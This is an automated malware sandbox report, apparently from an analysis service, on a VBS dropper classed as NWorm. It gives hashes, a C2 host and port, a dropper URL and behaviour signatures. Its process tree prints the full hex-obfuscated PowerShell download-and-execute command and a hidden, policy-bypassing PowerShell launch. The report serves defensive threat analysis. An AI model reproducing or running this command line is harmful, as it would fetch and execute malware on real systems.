Analysis
-
max time kernel
92s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
04-03-2022 19:23
General
-
Target
ANVJYRGCEHLJVEQHRRQKR.vbs
-
Size
5KB
-
MD5
b8e6f98016f0cbb8ab5b6d8699538648
-
SHA1
fd72b20ec5ecf894454f319808582b43b769df05
-
SHA256
9841a5ee76188c7c50f2438e125fa6d60416704e7d40885571491cec4729dd90
-
SHA512
c67f7254b27a61e1a674e64f7aab56c1ee0aaeebcfe451343d8375e687516bfad6e9d002039d446b5955c28a13a46741ba00d72a5f25de9c2dc32e76f769d6f3
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://rebrand.ly/rlzgijk
Extracted
Family
nworm
Version
v0.3.8
C2
nyanwmoney.duckdns.org:8891
Mutex
594274bc
Signatures
-
NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ANVJYRGCEHLJVEQHRRQKR.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $Hx = 'https://rebrand.ly/rlzgijk'; iex (( (20, 22,20,24 ,28, 20, 73, 65, 54, '2d',69, 74, 45 ,'6d' ,20 ,27, 76 ,41 , 52 ,69 ,41 , 62 , '6c' , 65 , '3a','4f',66,53, 27,20, 20,27 , 27,20, 29 , 20 , 22 , '2b' , 20 , '5b' ,53 , 54,52,49 , '6e' , 47 ,'5d' , 28 ,27 ,34 , 39,67, 34 , 35 ,69 , 35 , 38 , '4b', 32, 38, '4b', 34 , 65 , 40 ,36, 35 , 67 ,37 ,37 , 69, 32 ,64 ,52,34, 66,'4b', 36, 32,53 , 36, 61 , '7d' , 36 ,35,67, 36,33 , 52,37 ,34 ,'5f' , 32,30 ,67,34 , 65 ,53,36 , 35 , 67 ,37, 34 , 53,32 ,65 , '7d', 35 ,37 , '4b', 36 ,35 , '5f' , 36 ,32, 52,34,33 ,67 ,36,63 , '4b',36 , 39 , 53, 36 , 35 ,69,36 , 65, 67 , 37,34, 53 , 32, 39 ,67 , 32, 65 ,67,34,34, 40 , 36, 66,53 , 37 , 37 , 40,36 ,65, '5f' ,36, 63 ,53 , 36,66,69, 36 , 31, '4b' , 36 , 34 ,40, 35 , 33 , '4b' , 37 ,34 , 67,37,32, 69 , 36, 39, 67 ,36,65 , '7d',36, 37 ,'7d' ,32 ,38,'5f' ,32,34 ,'7d' , 34,38,40 ,37 ,38, '7d' ,32,39 , 27, '2e', 53 ,50 ,'4c',49 ,54,28 ,27 ,'7d' , '4b', 67 , 69,40, '5f' , 52 , 53 , 27, 29 ,20 ,'7c' ,20, 25 ,'7b',20, 28, 20 , '5b' ,43, 68 , 61, 52 ,'5d' ,20, 28,'5b',43, '6f' , '6e' , 76, 65 ,72 ,54 , '5d' , '3a' , '3a', 74,'4f' , 49 ,'6e' , 54 , 31 ,36 ,28,28 ,20 , '5b' ,53 , 74,72, 69, '4e' ,47, '5d' ,24 , '5f',29, '2c' ,31,36 , 29, 20,29, 29 ,'7d' , 20 ,29,20 , '2b',22 , 24 , 28,73 ,45, 54,'2d', 49,74 , 65 ,'4d' , 20 ,20, 27, 56 ,61, 52,69 , 61, 42,'4c' ,65,'3a','6f', 46,53,27 ,20 , 27 ,20,27, 20 , 29 , 20 ,22 ,20, '7c', 26, 20 , 28 , 20, 24 , 50, 73 , 48, '6f','6d', 65, '5b' ,32 ,31,'5d' , '2b', 24, 70,53 ,48,'6f' , '4d' , 65 , '5b' ,33 ,30 , '5d' ,'2b',27, 78, 27 ,29)|forEAch-objEcT {([ConveRT]::toint16( ([stRinG]$_ ) ,16 )-AS[cHar])} ) -joIN '' )1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\DNPLRSXSEBIRTBQHEONCJD\DNPLRSXSEBIRTBQHEONCJD.ps12⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\DNPLRSXSEBIRTBQHEONCJD\DNPLRSXSEBIRTBQHEONCJD.ps1MD5
92a70b28f158ffeedbbc61082dafc675
SHA1f3f7ef02f5d849e37db8e302df740af6b6a00142
SHA256382eb824d09f1b10c96ce94b97941e2f0d3c093d14317b215ba5499f42928fff
SHA5128c57e50ec77b8cd026a27b1120f3b3b2c216f8cbe8a75360b5ac2204b8fb37c6a4f425f545ed7ad0db64d99eb584fc4bdcbae5662c17b291d44ccceb6ebcb97d
-
memory/728-146-0x0000023929490000-0x0000023929492000-memory.dmpFilesize
8KB
-
memory/728-152-0x00000239295C0000-0x00000239295DA000-memory.dmpFilesize
104KB
-
memory/728-151-0x0000023929496000-0x0000023929498000-memory.dmpFilesize
8KB
-
memory/728-147-0x0000023929493000-0x0000023929495000-memory.dmpFilesize
8KB
-
memory/728-145-0x00007FFA6A450000-0x00007FFA6AF11000-memory.dmpFilesize
10.8MB
-
memory/1944-140-0x0000027E78F66000-0x0000027E78F68000-memory.dmpFilesize
8KB
-
memory/1944-134-0x0000027E79240000-0x0000027E79262000-memory.dmpFilesize
136KB
-
memory/1944-139-0x0000027E78F63000-0x0000027E78F65000-memory.dmpFilesize
8KB
-
memory/1944-137-0x00007FFA6A450000-0x00007FFA6AF11000-memory.dmpFilesize
10.8MB
-
memory/1944-138-0x0000027E78F60000-0x0000027E78F62000-memory.dmpFilesize
8KB
-
memory/1972-153-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/1972-154-0x00000000751D0000-0x0000000075980000-memory.dmpFilesize
7.7MB
-
memory/1972-155-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/1972-156-0x00000000054C0000-0x000000000555C000-memory.dmpFilesize
624KB
-
memory/1972-157-0x0000000005B10000-0x00000000060B4000-memory.dmpFilesize
5.6MB
-
memory/1972-158-0x00000000055D0000-0x0000000005636000-memory.dmpFilesize
408KB